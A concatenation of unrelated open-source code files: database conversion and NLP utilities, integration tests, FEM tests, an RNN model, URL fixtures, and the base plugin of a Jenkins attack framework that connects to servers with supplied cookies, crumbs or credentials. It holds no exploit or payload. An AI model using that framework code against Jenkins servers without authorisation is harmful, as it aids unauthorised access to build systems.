table = table_tuple[0]
url = "%s:%s&tbl=%s" % (url_list, database, table)
try:
doc = urlopen(url).read();
doc = json.loads(doc)
except Exception as err:
print "url: %s, error: %s" % (url, err)
continue
create_table_stmt = doc["TABLE"]
ddl = create_table_stmt[0].encode("utf-8")
if ddl.find("\"storage_type\" = \"ROW\"") != -1 :
table = re.search('CREATE TABLE `(.*)`', ddl).group(1)
print "alter table " + database + "." + table + " set(\"storage_type\"=\"column\");"
def main():
cf = ConfigParser.ConfigParser()
cf.read("./conf")
host = cf.get('cluster', 'fe_host')
port = int(cf.get('cluster', 'port'))
http_port = int(cf.get('cluster', 'http_port'))
user = cf.get('cluster', 'username')
passwd = cf.get('cluster', 'password')
converter = convert_row_to_column()
converter.connect(host, port, http_port, user, passwd)
converter.run();
converter.close()
if __name__ == '__main__':
main()
|
mindmeld/components/_util.py | ritvikshrivastava/mindmeld | 580 | 12663717 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module containing various utility functions for MindMeld NLP Components.
"""
import importlib
import logging
import enum
from typing import Union, Optional, List
from collections import defaultdict
from ..exceptions import InvalidMaskError
logger = logging.getLogger(__name__)
def _is_module_available(module_name: str):
"""
checks if a module is available or not (eg. _is_module_available("sentence_transformers"))
Args:
module_name (str): name of the model to check
Returns:
bool, if or not the given module exists
"""
return bool(importlib.util.find_spec(module_name) is not None)
def _get_module_or_attr(module_name: str, func_name: str = None):
"""
Loads an attribute from a module or a module itself
(check if the module exists before calling this function)
"""
m = importlib.import_module(module_name)
if not func_name:
return m
if func_name not in dir(m):
raise ImportError(f"Cannot import {func_name} from {module_name}")
return getattr(m, func_name)
class MaskState(enum.Enum):
"""
This class encoded three NLP states:
unset: state when the user has neither allowed nor denied the NLP component.
This state is needed to propagate state up/down the tree since we only
propagate state to unset nodes, never to user-defined nodes
allow: state when the user has explicitly allowed a node.
deny: state when the user has explicitly denied a node.
"""
unset = enum.auto()
allow = enum.auto()
deny = enum.auto()
def __bool__(self):
return self == self.allow
class TreeNode:
def __init__(self, nlp_name: str,
parent: Optional['TreeNode'] = None,
children: Optional[List['TreeNode']] = None,
mask_state: Optional[MaskState] = None):
"""
Constructor for the tree node
Args:
nlp_name: The name of the NLP component. eg. "weather"
is a name for a domain
parent: The parent of the NLP component. eg. parent of
an intent is a domain
children: The children of the NLP component. eg.
children of an intent are entities
mask_state: The mask state of the NLP component
"""
self.nlp_name = nlp_name
self.mask_state = mask_state
self.parent = parent
self.children = children or []
class TreeNlp:
"""
This data structure encodes a NLP tree hierarchy where each node
encodes a mask state, based on which certain NLP components are allowed
or denied based on user input
"""
def __init__(self, nlp, mask_state=MaskState.unset):
# root
self.root = TreeNode('root', mask_state=mask_state)
# construct NLP tree
for domain in nlp.domains:
domain_node = TreeNode(domain, parent=self.root, mask_state=mask_state)
self.root.children.append(domain_node)
for intent in nlp.domains[domain].intents:
intent_node = TreeNode(intent, parent=domain_node, mask_state=mask_state)
domain_node.children.append(intent_node)
entities = nlp.domains[domain].intents[intent].entities
for entity in entities:
entity_node = TreeNode(entity, parent=intent_node, mask_state=mask_state)
intent_node.children.append(entity_node)
for role in entities[entity].role_classifier.roles:
role_node = TreeNode(role, parent=intent_node, mask_state=mask_state)
entity_node.children.append(role_node)
@staticmethod
def _convert_tree_node_to_values(*nlp_components):
result = [None for _ in ['domain', 'intent', 'entity', 'role']]
for idx, component in enumerate(nlp_components):
component_name = component.nlp_name if isinstance(
component, TreeNode) else component
result[idx] = component_name
return result
def get_domain_nodes(self):
return self.root.children or []
def get_intent_nodes(self, domain: Union[str, TreeNode]):
domain, _, _, _ = self._convert_tree_node_to_values(domain)
for domain_node in self.root.children:
if domain_node.nlp_name == domain:
return domain_node.children
return []
def get_entity_nodes(self, domain: Union[str, TreeNode],
intent: Union[str, TreeNode]):
domain, intent, _, _ = self._convert_tree_node_to_values(domain, intent)
for intent_node in self.get_intent_nodes(domain):
if intent_node.nlp_name == intent:
return intent_node.children
return []
def get_role_nodes(self, domain: Union[str, TreeNode],
intent: Union[str, TreeNode],
entity: Union[str, TreeNode]):
domain, intent, entity, _ = self._convert_tree_node_to_values(
domain, intent, entity)
for entity_node in self.get_entity_nodes(domain, intent):
if entity_node.nlp_name == entity:
return entity_node.children
return []
def update(self, mask_state: bool,
domain: Union[str, TreeNode],
intent: Optional[Union[str, TreeNode]] = None,
entity: Optional[Union[str, TreeNode]] = None,
role: Optional[Union[str, TreeNode]] = None):
"""
This function updates the NLP tree with mask values. Note:
Args:
mask_state: True is mask off, False is mask on
domain: domain of NLP
intent: intent of NLP
entity: entity of NLP
role: role of NLP
"""
domain_name, intent_name, entity_name, role_name = self._convert_tree_node_to_values(
domain, intent, entity, role)
# validation check
nlp_components = [domain_name, intent_name, entity_name, role_name]
for i in range(1, len(nlp_components)):
if any(not component for component in nlp_components[:i]) and nlp_components[i]:
raise InvalidMaskError(
f"Unable to resolve NLP hierarchy since "
f"{str(nlp_components[i])} does not have an valid ancestor")
for domain_node in self.get_domain_nodes():
if domain_node.nlp_name != domain_name:
continue
if not intent_name:
domain_node.mask_state = mask_state
return
for intent_node in self.get_intent_nodes(domain_node.nlp_name):
if intent_name not in ('*', intent_node.nlp_name):
continue
if not entity_name:
intent_node.mask_state = mask_state
# If the intent is * and it's terminal, eg. "domain.*", then
# we mask the intent AND continue to iterate through the other
# intents of the domain
if intent_name == '*':
continue
# If the intent is not *, then it's terminal, eg. "domain.intent",
# then we mask the intent and end the function's operations
return
for entity_node in self.get_entity_nodes(domain_node.nlp_name,
intent_node.nlp_name):
if entity_name not in ('*', entity_node.nlp_name):
continue
if not role_name:
entity_node.mask_state = mask_state
# If the entity is * and it's terminal, eg. "domain.intent.*", then
# we mask the entity AND continue to iterate through the other
# entities of the intent
if entity_name == '*':
continue
# If the entity is not *, then it's terminal, eg. "domain.intent.entity",
# then we mask the entity and end the function's operations
return
for role_node in self.get_role_nodes(domain_node.nlp_name,
intent_node.nlp_name,
entity_node.nlp_name):
if role_name not in ('*', role_node.nlp_name):
continue
role_node.mask_state = mask_state
if role_name == '*':
continue
return
def _sync_nodes(self):
"""
This function does two actions sequentially:
1. down-flow: flow mask decisions down the tree
2. up-flow: flow mask decisions up the tree
Each node has three mask states: allow, deny and unset. allow and deny
are explicitly set by the user while unset is the default state.
For 1., if a parent is allowed, then all its "eligible" descendant components
are allowed as well. An "eligible" component is a node set to unset (i.e. non-user defined),
since a user might have explicitly set a child.
For 2., if all children of a NLP component are not allowed, then the parent
will not be allowed as well. When we do an up-flow, we update nodes regardless of being
explicitly set or not. This is because of the rule that if all the descendants are masked,
the parent should be masked as well, even if it's explicitly set to the contrary.
"""
for domain in self.get_domain_nodes():
intents = self.get_intent_nodes(domain)
for intent in intents:
# sync down
if domain.mask_state != MaskState.unset and \
intent.mask_state == MaskState.unset:
intent.mask_state = domain.mask_state
entities = self.get_entity_nodes(domain, intent)
for entity in entities:
# sync down
if intent.mask_state != MaskState.unset and \
entity.mask_state == MaskState.unset:
entity.mask_state = intent.mask_state
roles = self.get_role_nodes(domain, intent, entity)
for role in roles:
# sync down
if entity.mask_state != MaskState.unset and \
role.mask_state == MaskState.unset:
role.mask_state = entity.mask_state
# sync up entity-role
if roles and all(role.mask_state == MaskState.deny for role in roles):
entity.mask_state = MaskState.deny
# We do not perform sync ups for entities since tagger models cannot
# deny their parent text classification models. For example,
# just because the developer wants to deny all the entities in a particular
# intent, doesn't mean the intent should be denied as well.
# sync up domain-intent
if intents and all(intent.mask_state == MaskState.deny for intent in intents):
domain.mask_state = MaskState.deny
def _default_to_regular(self, d):
if isinstance(d, defaultdict):
d = {k: self._default_to_regular(v) for k, v in d.items()}
return d
def to_dict(self) -> dict:
"""
This function serializes TreeNlp into a dict structure by only adding keys representing
allow MaskState nodes and not adding keys for deny and unset MaskState nodes.
"""
self._sync_nodes()
# The result has three nested defaultdicts: {domain: {intent: {entity: {role: {}}}}}
result = defaultdict(lambda: defaultdict(lambda: defaultdict(dict)))
for domain in self.get_domain_nodes():
if domain.mask_state:
result[domain.nlp_name] = defaultdict(lambda: defaultdict(dict))
for intent in self.get_intent_nodes(domain.nlp_name):
if intent.mask_state:
result[domain.nlp_name][intent.nlp_name] = defaultdict(dict)
for entity in self.get_entity_nodes(domain.nlp_name,
intent.nlp_name):
if entity.mask_state:
result[domain.nlp_name][intent.nlp_name][entity.nlp_name] = {}
for role in self.get_role_nodes(domain.nlp_name,
intent.nlp_name,
entity.nlp_name):
if role.mask_state:
result[domain.nlp_name][intent.nlp_name][
entity.nlp_name][role.nlp_name] = {}
serialize_results = self._default_to_regular(result)
return serialize_results
|
libs/JAF/BasePlugin.py | sc979/jenkins-attack-framework | 451 | 12663733 | import base64
import logging
import queue
import sys
from urllib.parse import urlparse
import requests.exceptions as req_exc
from libs import jenkinslib
def _logging_fatal(msg, *args, **kwargs):
logging.critical(msg, *args, **kwargs)
exit(1)
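# Context manager that temporarily redirects stdout to stderr (restoring the
# previous stdout on exit), presumably so status output does not end up in a
# redirected or overridden stdout stream.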
class HijackStdOut:
def __enter__(self):
# Preserve old stdout because we may already have hijacked it
self.old_stdout = sys.stdout
sys.stdout = sys.stderr
return sys.stdout
def __exit__(self, _type, value, traceback):
sys.stdout = self.old_stdout
class BasePlugin:
"""JAF Plugin Base Class"""
results_queue = queue.Queue()
jobs_queue = queue.Queue()
def __init__(self, args):
self.args = args
logging.basicConfig(format="%(asctime)s - %(message)s")
self.logging = logging.getLogger()
self.logging.fatal = _logging_fatal
self.server_url = urlparse(self.args.server)
if args.output_file:
try:
sys.stdout = open(args.output_file, "w")
except Exception:
self.logging.fatal("Specified Output File Path is invalid or inaccessible.")
def _get_jenkins_server(self, cred):
"""Setup initial connection to the jenkins server and handle authentication
:param cred: Credential dict"""
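# Credential dict shapes, as inferred from the branches below:
# {"cookie": ..., "crumb": ...} -> cookie auth,
# {"authheader": "user:password"} -> HTTP Basic,
# {"username": ..., "password": ...} -> username/password login,
# None -> anonymous access.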
try:
if cred:
if "cookie" in cred:
return jenkinslib.Jenkins(
self.args.server,
cookie=cred["cookie"],
crumb=cred["crumb"],
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
elif "authheader" in cred:
return jenkinslib.Jenkins(
self.args.server,
authheader="Basic "
+ base64.b64encode(cred["authheader"].encode("utf8")).decode("ascii"),
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
else:
return jenkinslib.Jenkins(
self.args.server,
username=cred["username"],
password=cred["password"],
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
else:
return jenkinslib.Jenkins(
self.args.server,
timeout=self.args.timeout,
headers={"User-Agent": self.args.user_agent},
)
except jenkinslib.JenkinsException as ex:
if "[403]" in str(ex).split("\n")[0]:
self.logging.fatal(
"%s authentication failed or no access", self._get_username(cred)
)
else:
self.logging.fatal(
"Unable to access Jenkins at: %s With User: %s For Reason:\n\t%s"
% (
(
self.server_url.netloc
if len(self.server_url.netloc) > 0
else self.args.server
),
self._get_username(cred),
str(ex).split("\n")[0],
)
)
except (req_exc.SSLError, req_exc.ConnectionError):
self.logging.fatal(
"Unable to connect to: "
+ (self.server_url.netloc if len(self.server_url.netloc) > 0 else self.args.server)
)
except Exception:
self.logging.exception("")
def _get_username(self, cred):
"""Utility function to return the user based on the cred type to display in error messages."""
if not cred:
return "Anonymous"
elif "username" in cred:
return cred["username"]
elif "authheader" in cred:
return cred["authheader"].split(":")[0]
elif not cred:
return "Anonymous"
else:
return "Cookie (User Unknown)"
def _validate_jenkins_server_accessible(self):
"""Utility function to return if we appear to have access to the jenkins server or not"""
# Catch inaccessible server before slamming a bunch of threads at it.
cred = None
server = self._get_jenkins_server(cred)
if server.basic_access_check() != 500:
return True
else:
return False
|
tests/integration/cli/assets_test.py | gamechanger/dusty | 421 | 12663734 | import os
import tempfile
import time
from dusty.systems.virtualbox import asset_is_set, run_command_on_vm
from dusty import constants
from dusty.source import Repo
from dusty.memoize import reset_memoize_cache
from ...testcases import DustyIntegrationTestCase
from ...fixtures import assets_fixture
class TestAssetsCLI(DustyIntegrationTestCase):
def setUp(self):
super(TestAssetsCLI, self).setUp()
assets_fixture()
self.run_command('repos override github.com/lib/a {}'.format(self.fake_local_repo_location))
self.required_app_file = tempfile.mkstemp()[1]
with open(self.required_app_file, 'w') as f:
f.write('required_app_contents')
self.optional_app_file = tempfile.mkstemp()[1]
with open(self.optional_app_file, 'w') as f:
f.write('optional_app_contents')
self.required_lib_file = tempfile.mkstemp()[1]
with open(self.required_lib_file, 'w') as f:
f.write('required_lib_contents')
self.optional_lib_file = tempfile.mkstemp()[1]
with open(self.optional_lib_file, 'w') as f:
f.write('optional_lib_contents')
self.run_command('bundles activate bundle-a')
self.run_command('assets set required_app_asset {}'.format(self.required_app_file))
self.run_command('assets set required_lib_asset {}'.format(self.required_lib_file))
def tearDown(self):
os.remove(self.required_app_file)
os.remove(self.required_lib_file)
os.remove(self.optional_app_file)
os.remove(self.optional_lib_file)
run_command_on_vm('sudo rm -rf {}'.format(constants.VM_ASSETS_DIR))
try:
self.run_command('stop --rm')
except:
pass
super(TestAssetsCLI, self).tearDown()
@DustyIntegrationTestCase.retriable_assertion(.1, 5)
def assertAssetContentsRetriable(self, container_path, asset_contents):
self.assertFileContentsInContainer('app-a', container_path, asset_contents)
def test_asset_in_container(self):
self.run_command('up --no-pull')
self.assertAssetContentsRetriable('/required_app_path', 'required_app_contents')
self.assertAssetContentsRetriable('/required_lib_path', 'required_lib_contents')
def test_required_asset_fail(self):
self.run_command('bundles activate bundle-a')
self.run_command('assets unset required_app_asset')
with self.assertRaises(self.CommandError):
output = self.run_command('up --no-pull')
def test_optional_asset(self):
self.run_command('assets set optional_app_asset {}'.format(self.optional_app_file))
self.run_command('assets set optional_lib_asset {}'.format(self.optional_lib_file))
self.run_command('up --no-pull')
self.assertAssetContentsRetriable('/optional_app_path', 'optional_app_contents')
self.assertAssetContentsRetriable('/optional_lib_path', 'optional_lib_contents')
def test_unset(self):
self.run_command('assets unset required_app_asset')
self.run_command('assets unset required_lib_asset')
reset_memoize_cache()
self.assertFalse(asset_is_set('required_app_asset'))
self.assertFalse(asset_is_set('required_lib_asset'))
def test_read(self):
with self.assertLogToClientOutput('required_app_contents'):
self.run_command('assets read required_app_asset')
with self.assertLogToClientOutput('required_lib_contents'):
self.run_command('assets read required_lib_asset')
|
Anaconda-files/Program_18a.py | arvidl/dynamical-systems-with-applications-using-python | 106 | 12663740 | # Program 18a: Generating a multifractal image.
# Save the image.
# See Figure 18.1(b).
import numpy as np
import matplotlib.pyplot as plt
from skimage import exposure, io, img_as_uint
p1, p2, p3, p4 = 0.3, 0.4, 0.25, 0.05
p = [[p1, p2], [p3, p4]]
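# Multiplicative cascade: each of the 8 iterations splits every cell of the
# current probability matrix into a 2x2 block weighted by p1..p4, doubling
# the resolution each step and ending with a 512x512 multifractal measure.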
for k in range(1, 9, 1):
M = np.zeros([2 ** (k + 1), 2 ** (k + 1)])
M.tolist()
for i in range(2**k):
for j in range(2**k):
M[i][j] = p1 * p[i][j]
M[i][j + 2**k] = p2 * p[i][j]
M[i + 2**k][j] = p3 * p[i][j]
M[i + 2**k][j + 2**k] = p4 * p[i][j]
p = M
# Plot the multifractal image.
M = exposure.adjust_gamma(M, 0.2)
plt.imshow(M, cmap='gray', interpolation='nearest')
# Save the image as a portable network graphics (png) image.
im = np.array(M, dtype='float64')
im = exposure.rescale_intensity(im, out_range='float')
im = img_as_uint(im)
io.imsave('Multifractal.png', im)
io.show()
|
utils/testing/base.py | maznu/peering-manager | 127 | 12663784 | import json
from ipaddress import IPv4Address, IPv4Interface, IPv6Address, IPv6Interface
from django.contrib.auth.models import Permission, User
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import FieldDoesNotExist
from django.db.models import ManyToManyField
from django.forms.models import model_to_dict
from django.test import Client
from django.test import TestCase as _TestCase
from requests.models import HTTPError
from rest_framework import status
from taggit.managers import TaggableManager
from .functions import extract_form_failures
class MockedResponse(object):
def __init__(
self, status_code=status.HTTP_200_OK, ok=True, fixture=None, content=None
):
self.status_code = status_code
if fixture:
self.content = self.load_fixture(fixture)
elif content:
self.content = json.dumps(content)
else:
self.content = None
self.ok = ok
def load_fixture(self, path):
with open(path, "r") as f:
return f.read()
def json(self):
return json.loads(self.content)
def raise_for_status(self):
if (
status.HTTP_400_BAD_REQUEST
<= self.status_code
<= status.HTTP_511_NETWORK_AUTHENTICATION_REQUIRED
):
raise HTTPError("", response=self)
class TestCase(_TestCase):
user_permissions = ()
def setUp(self):
# Create the test user and assign permissions
self.user = User.objects.create_user(username="testuser")
self.add_permissions(*self.user_permissions)
# Initialize the test client
self.client = Client()
self.client.force_login(self.user)
def add_permissions(self, *names):
"""
Assign a set of permissions to the test user.
Accepts permission names in the form <app>.<action>_<model>.
"""
for name in names:
app, codename = name.split(".")
perm = Permission.objects.get(
content_type__app_label=app, codename=codename
)
self.user.user_permissions.add(perm)
def remove_permissions(self, *names):
"""
Remove a set of permissions from the test user, if assigned.
"""
for name in names:
app, codename = name.split(".")
perm = Permission.objects.get(
content_type__app_label=app, codename=codename
)
self.user.user_permissions.remove(perm)
def assertHttpStatus(self, response, expected_status):
"""
Provide detail when receiving an unexpected HTTP response.
"""
err_message = None
# Construct an error message only if the test is going to fail
if response.status_code != expected_status:
if hasattr(response, "data"):
# REST API response; pass the response data through directly
err = response.data
else:
# Try to extract form validation errors from the response HTML
form_errors = extract_form_failures(response.content)
err = form_errors or response.content or "No data"
err_message = f"Expected HTTP status {expected_status}; received {response.status_code}: {err}"
self.assertEqual(response.status_code, expected_status, err_message)
class ModelTestCase(TestCase):
"""
Parent class for test cases which deal with models.
"""
model = None
def add_permissions(self, *names):
perms = []
for name in names:
perms.append(
f"{self.model._meta.app_label}.{name}_{self.model._meta.model_name}"
)
super().add_permissions(*perms)
def remove_permissions(self, *names):
perms = []
for name in names:
perms.append(
f"{self.model._meta.app_label}.{name}_{self.model._meta.model_name}"
)
super().remove_permissions(*perms)
def _get_queryset(self):
"""
Returns a base queryset suitable for use in test methods.
"""
return self.model.objects.all()
def prepare_instance(self, instance):
"""
Override this method to perform manipulation of an instance prior to its
evaluation against test data.
"""
return instance
def model_to_dict(self, instance, fields, api=False):
"""
Returns a dictionary representation of an instance.
"""
# Prepare the instance and call Django's model_to_dict() to extract all fields
model_dict = model_to_dict(self.prepare_instance(instance), fields=fields)
# Map any additional (non-field) instance attributes that were specified
for attr in fields:
if hasattr(instance, attr) and attr not in model_dict:
model_dict[attr] = getattr(instance, attr)
for key, value in list(model_dict.items()):
try:
field = instance._meta.get_field(key)
except FieldDoesNotExist:
# Attribute is not a model field
continue
# Handle ManyToManyFields
if value and type(field) in (ManyToManyField, TaggableManager):
if field.related_model is ContentType:
model_dict[key] = sorted(
[f"{ct.app_label}.{ct.model}" for ct in value]
)
else:
model_dict[key] = sorted([obj.pk for obj in value])
if api and type(value) in (
IPv4Address,
IPv6Address,
IPv4Interface,
IPv6Interface,
):
model_dict[key] = str(value)
if api:
# Replace ContentType numeric IDs with <app_label>.<model>
if type(getattr(instance, key)) is ContentType:
ct = ContentType.objects.get(pk=value)
model_dict[key] = f"{ct.app_label}.{ct.model}"
return model_dict
def assertInstanceEqual(self, instance, data, exclude=None, api=False):
"""
Compares a model instance to a dictionary, checking that its attribute values
match those specified in the dictionary.
"""
if exclude is None:
exclude = []
fields = [k for k in data.keys() if k not in exclude]
model_dict = self.model_to_dict(instance, fields=fields, api=api)
# Omit any dictionary keys which are not instance attributes or have been excluded
relevant_data = {
k: v for k, v in data.items() if hasattr(instance, k) and k not in exclude
}
self.assertDictEqual(model_dict, relevant_data)
|
tests/test_integration.py | guillaumehuet/SolidsPy | 190 | 12663794 | # -*- coding: utf-8 -*-
"""
Integration tests for solidspy
"""
import numpy as np
from scipy.sparse.linalg import eigsh
import solidspy.postprocesor as pos
import solidspy.assemutil as ass
import solidspy.solutil as sol
def test_4_elements():
"""2×2 mesh with uniaxial load"""
nodes = np.array([
[0, 0, 0],
[1, 2, 0],
[2, 2, 2],
[3, 0, 2],
[4, 1, 0],
[5, 2, 1],
[6, 1, 2],
[7, 0, 1],
[8, 1, 1]])
cons = np.array([
[0, -1],
[0, -1],
[0, 0],
[0, 0],
[-1, -1],
[0, 0],
[0, 0],
[0, 0],
[0, 0]])
eles = np.array([
[0, 1, 0, 0, 4, 8, 7],
[1, 1, 0, 4, 1, 5, 8],
[2, 1, 0, 7, 8, 6, 3],
[3, 1, 0, 8, 5, 2, 6]])
loads = np.array([
[3, 0, 1],
[6, 0, 2],
[2, 0, 1]])
mater = np.array([[1.0, 0.3]])
assem_op, bc_array, neq = ass.DME(cons, eles)
stiff, _ = ass.assembler(eles, mater, nodes, neq, assem_op)
load_vec = ass.loadasem(loads, bc_array, neq)
disp = sol.static_sol(stiff, load_vec)
disp_complete = pos.complete_disp(bc_array, nodes, disp)
disp_analytic = np.array([
[ 0.6, 0.0],
[-0.6, 0.0],
[-0.6, 4.0],
[0.6, 4.0],
[0.0, 0.0],
[-0.6, 2.0],
[0.0, 4.0],
[0.6, 2.0],
[0.0, 2.0]])
assert np.allclose(disp_complete, disp_analytic)
def test_2_elements():
"""2x1 mesh cantilever beam"""
nodes = np.array([
[0, 0, 0],
[1, 1, 0],
[2, 2, 0],
[3, 0, 1],
[4, 1, 1],
[5, 2, 1]])
cons = np.array([
[-1, -1],
[0, 0],
[0, 0],
[-1, -1],
[0, 0],
[0, 0]])
eles = np.array([
[0, 1, 0, 0, 1, 4, 3],
[1, 1, 0, 1, 2, 5, 4]])
loads = np.array([
[2, 0, -0.5],
[5, 0, -0.5]])
mater = np.array([[1.0, 0.3]])
assem_op, bc_array, neq = ass.DME(cons, eles)
stiff, _ = ass.assembler(eles, mater, nodes, neq, assem_op)
load_vec = ass.loadasem(loads, bc_array, neq)
disp = sol.static_sol(stiff, load_vec)
disp_complete = pos.complete_disp(bc_array, nodes, disp)
disp_analytic = 1/45 * np.array([
[0, 0],
[-273, -390],
[-364, -1144],
[0, 0],
[273, -390],
[364, -1144]])
assert np.allclose(disp_complete, disp_analytic)
def test_beams():
"""Beams with axial force"""
# Analytic problem
nodes = np.array([
[0, 0.0, 0.0],
[1, 0.0, 6.0],
[2, 4.0, 6.0]])
cons = np.array([
[-1, -1, -1],
[0, 0, 0],
[-1, -1, -1]])
mats = np.array([[200e9, 1.33e-4, 0.04]])
elements = np.array([
[0, 8, 0, 0, 1],
[1, 8, 0, 1, 2]])
loads = np.array([
[1, -12000, -24000, -6000]])
assem_op, bc_array, neq = ass.DME(cons, elements, ndof_node=3)
stiff, _ = ass.assembler(elements, mats, nodes, neq, assem_op,
sparse=False)
load_vec = ass.loadasem(loads, bc_array, neq, ndof_node=3)
solution = sol.static_sol(stiff, load_vec)
solution_analytic = np.array([-6.29e-6, -1.695e-5, -0.13e-3])
assert np.allclose(solution, solution_analytic, rtol=1e-1)
def test_eigs_truss():
"""Eigenvalues of a bar"""
nnodes = 513
x = np.linspace(0, np.pi, nnodes)
nodes = np.zeros((nnodes, 3))
nodes[:, 0] = range(nnodes)
nodes[:, 1] = x
cons = np.zeros((nnodes, 2))
cons[:, 1] = -1
cons[0, 0] = -1
cons[-1, 0] = -1
mats = np.array([[1.0, 1.0, 1.0]])
elements = np.zeros((nnodes - 1, 5 ), dtype=int)
elements[:, 0] = range(nnodes - 1)
elements[:, 1] = 6
elements[:, 3] = range(nnodes - 1)
elements[:, 4] = range(1, nnodes)
assem_op, bc_array, neq = ass.DME(cons, elements)
stiff, mass = ass.assembler(elements, mats, nodes, neq, assem_op)
vals, _ = eigsh(stiff, M=mass, which="SM")
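    # An axial bar of length pi with unit properties, fixed at both ends, has analytic
    # eigenvalues n**2, which is what the assertion below checks for n = 1..6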
assert np.allclose(vals, np.linspace(1, 6, 6)**2, rtol=1e-2)
def test_eigs_beam():
"""Eigenvalues of a cantilever beam"""
nnodes = 10
x = np.linspace(0, np.pi, nnodes)
nodes = np.zeros((nnodes, 3))
nodes[:, 0] = range(nnodes)
nodes[:, 1] = x
cons = np.zeros((nnodes, 3))
cons[0, :] = -1
cons[:, 0] = -1
mats = np.array([[1.0, 1.0, 1.0, 1.0]])
elements = np.zeros((nnodes - 1, 5 ), dtype=int)
elements[:, 0] = range(nnodes - 1)
elements[:, 1] = 7
elements[:, 3] = range(nnodes - 1)
elements[:, 4] = range(1, nnodes)
assem_op, bc_array, neq = ass.DME(cons, elements, ndof_node=3)
stiff, mass = ass.assembler(elements, mats, nodes, neq, assem_op)
vals, _ = eigsh(stiff, M=mass, which="SM")
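    # The quartic roots of the eigenvalues are the cantilever wavenumbers beta_n, i.e. the
    # roots of cos(x)*cosh(x) = -1 divided by L = pi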
vals_analytic = np.array([0.596864162694467, 1.49417561427335,
2.50024694616670, 3.49998931984744,
4.50000046151508, 5.49999998005609])
assert np.allclose(vals**0.25, vals_analytic, rtol=1e-2)
|
malaya_speech/train/model/uis_rnn/model.py | ishine/malaya-speech | 111 | 12663803 | import tensorflow as tf
_INITIAL_SIGMA2_VALUE = 0.1
class CoreRNN(tf.keras.layers.Layer):
def __init__(
self,
observation_dim=256,
rnn_hidden_size=512,
rnn_depth=1,
rnn_dropout=0.0,
rnn_cell=tf.keras.layers.GRU,
**kwargs,
):
super(CoreRNN, self).__init__(name='CoreRNN', **kwargs)
# self.lstm = tf.keras.Sequential()
# for i in range(rnn_depth):
# self.lstm.add(
# tf.keras.layers.LSTM(
# rnn_hidden_size,
# return_sequences = True,
# return_state = True,
# kernel_regularizer = tf.keras.regularizers.l2(1e-5),
# recurrent_regularizer = tf.keras.regularizers.l2(1e-5),
# )
# )
self.lstm = tf.keras.layers.LSTM(
rnn_hidden_size,
return_sequences=True,
return_state=True,
kernel_regularizer=tf.keras.regularizers.l2(1e-5),
recurrent_regularizer=tf.keras.regularizers.l2(1e-5),
)
self.linear_mean1 = tf.keras.layers.Dense(
units=rnn_hidden_size,
dtype=tf.float32,
activation=tf.nn.relu,
kernel_regularizer=tf.keras.regularizers.l2(1e-5),
)
self.linear_mean2 = tf.keras.layers.Dense(
units=observation_dim,
dtype=tf.float32,
kernel_regularizer=tf.keras.regularizers.l2(1e-5),
)
def call(self, x, hidden=None, training=True):
output_seq = self.lstm(x, initial_state=hidden, training=training)
mean = self.linear_mean2(self.linear_mean1(output_seq[0]))
return mean, output_seq[1:]
class BeamState:
"""Structure that contains necessary states for beam search."""
def __init__(self, source=None):
if not source:
self.mean_set = []
self.hidden_set = []
self.neg_likelihood = 0
self.trace = []
self.block_counts = []
else:
self.mean_set = source.mean_set.copy()
self.hidden_set = source.hidden_set.copy()
self.trace = source.trace.copy()
self.block_counts = source.block_counts.copy()
self.neg_likelihood = source.neg_likelihood
def append(self, mean, hidden, cluster):
"""Append new item to the BeamState."""
self.mean_set.append(mean.clone())
self.hidden_set.append(hidden.clone())
self.block_counts.append(1)
self.trace.append(cluster)
class Model(tf.keras.Model):
def __init__(
self,
observation_dim=256,
rnn_hidden_size=512,
rnn_depth=1,
rnn_dropout=0.0,
sigma2=None,
transition_bias=None,
crp_alpha=1.0,
**kwargs,
):
super(Model, self).__init__(name='uis-rnn', **kwargs)
self.rnn_model = CoreRNN(
observation_dim, rnn_hidden_size, rnn_depth, rnn_dropout
)
self.estimate_sigma2 = sigma2 is None
self.estimate_transition_bias = transition_bias is None
        # Fall back to the initial value when sigma2 is to be estimated; otherwise keep the given value
        sigma2 = _INITIAL_SIGMA2_VALUE if self.estimate_sigma2 else sigma2
self.sigma2 = sigma2 * tf.get_variable(
name='sigma2',
shape=[observation_dim],
initializer=tf.ones_initializer(),
)
self.transition_bias = transition_bias
self.transition_bias_denominator = 0.0
self.crp_alpha = crp_alpha
def call(self, x, hidden=None, training=True):
return self.rnn_model(x, hidden=hidden, training=training)
|
tests/url_fixtures.py | shibli049/expynent | 438 | 12663807 | <filename>tests/url_fixtures.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
INVALID_URLS = [
'http://',
'http://.',
'http://..',
'http://../',
'http://?',
'http://??',
'http://??/',
'http://#',
'http://##',
'http://##/',
'http://foo.bar?q=Spaces should be encoded',
'//',
'//a',
'///a',
'///',
'http:///a',
'foo.com',
'rdar://1234',
'h://test',
'http:// shouldfail.com',
':// should fail',
'http://foo.bar/foo(bar)baz quux',
'htto://foo.bar/',
'http://-error-.invalid/',
'http://-a.b.co',
'http://a.b-.co',
'http://.www.foo.bar/',
]
VALID_URLS = [
'http://foo.com/blah_blah', 'http://foo.com/blah_blah/',
'http://foo.com/blah_blah_(wikipedia)',
'http://foo.com/blah_blah_(wikipedia)_(again)',
'http://www.example.com/wpstyle/?p=364',
'https://www.example.com/foo/?bar=baz&inga=42&quux',
'http://172.16.31.10/',
'http://172.16.31.10:8080/',
'http://foo.com/blah_(wikipedia)#cite-132',
'http://foo.com/blah_(wikipedia)_blah#cite-1',
u'http://foo.com/unicode_(✪)_in_parens',
'http://foo.com/(something)?after=parens',
'http://sub.damowmow.com/',
'http://code.google.com/events/#&product=browser',
'http://j.mp', 'ftp://foo.bar/baz',
'http://foo.bar/?q=Test%20URL-encoded%20stuff',
'http://1337.net',
'http://a.b-c.de',
'http://172.16.58.3',
'http://a.b--c.de/',
]
|
